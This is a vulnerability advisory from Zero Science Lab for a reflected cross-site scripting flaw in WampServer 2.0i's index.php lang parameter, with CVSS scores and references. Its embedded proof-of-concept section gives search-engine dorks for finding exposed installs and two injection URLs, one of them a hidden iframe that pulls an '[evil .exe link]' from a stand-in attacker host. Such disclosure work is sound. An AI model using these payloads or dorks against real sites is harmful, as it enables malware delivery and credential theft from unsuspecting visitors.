Gjoko KrsticZSL-2010-4926WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
80.9%
Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Advisory ID: ZSL-2010-4926
Type: Remote
Impact: Cross-Site Scripting
Risk: (2/5)
Release Date: 22.02.2010
Summary
WampServer - Apache, PHP, MySQL on Windows.
Description
WampServer is susceptible to cross-site scripting vulnerability. This issue is due to the application’s failure to properly sanitize user-supplied input. An attacker may leverage any of the cross-site scripting issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials, phishing as well as other attacks.
Vendor
Romain Bourdon (Roms) - <http://www.wampserver.com>
Affected Version
2.0i
Tested On
Microsoft Windows XP Professional SP3 (English)
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://secunia.com/advisories/38706>
[2] <http://securityreason.com/exploitalert/7841>
[3] <http://www.securityfocus.com/bid/38357>
[4] <http://www.packetstormsecurity.org/filedesc/wamp-xss.txt.html>
[5] <http://osvdb.org/62481>
[6] <http://www.security-database.com/detail.php?alert=CVE-2010-0700>
[7] <http://olex.openlogic.com/wazi/2010/wampserver-2-0i-medium/>
[8] <http://en.securitylab.ru/nvd/391082.php>
[9] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0700>
[10] <http://securityreason.com/securityalert/7052>
[11] <http://xforce.iss.net/xforce/xfdb/56417>
[12] <http://www.net-security.org/vuln.php?id=11244>
[13] <http://www.us-cert.gov/cas/bulletins/SB10-060.html>
[14] <https://vulners.com/cve/CVE-2010-0700>
Changelog
[22.02.2010] - Initial release
[22.02.2010] - Added reference [1] and [2]
[23.02.2010] - Added reference [3], [4] and [5]
[26.02.2010] - Added reference [6], [7], [8] and [9]
[28.02.2010] - Added reference [10]
[03.03.2010] - Added reference [11], [12] and [13]
[25.10.2021] - Added reference [14]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>----------------------------------------------------------------
Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Summary: WampServer - Apache, PHP, MySQL on Windows
Product web page: http://www.wampserver.com
Current version: 2.0i
Vulnerability discovered by Gjoko "LiquidWorm" Krstic
Zero Science Lab - http://www.zeroscience.mk
liquidworm gmail com
26.01.2010
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php
----------------------------------------------------------------
Dork:
"WampServer - Donate - Anaska"
"WAMPSERVER Homepage"
PoC:
http://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
http://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E
//EOF</p></body></html>Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
80.9%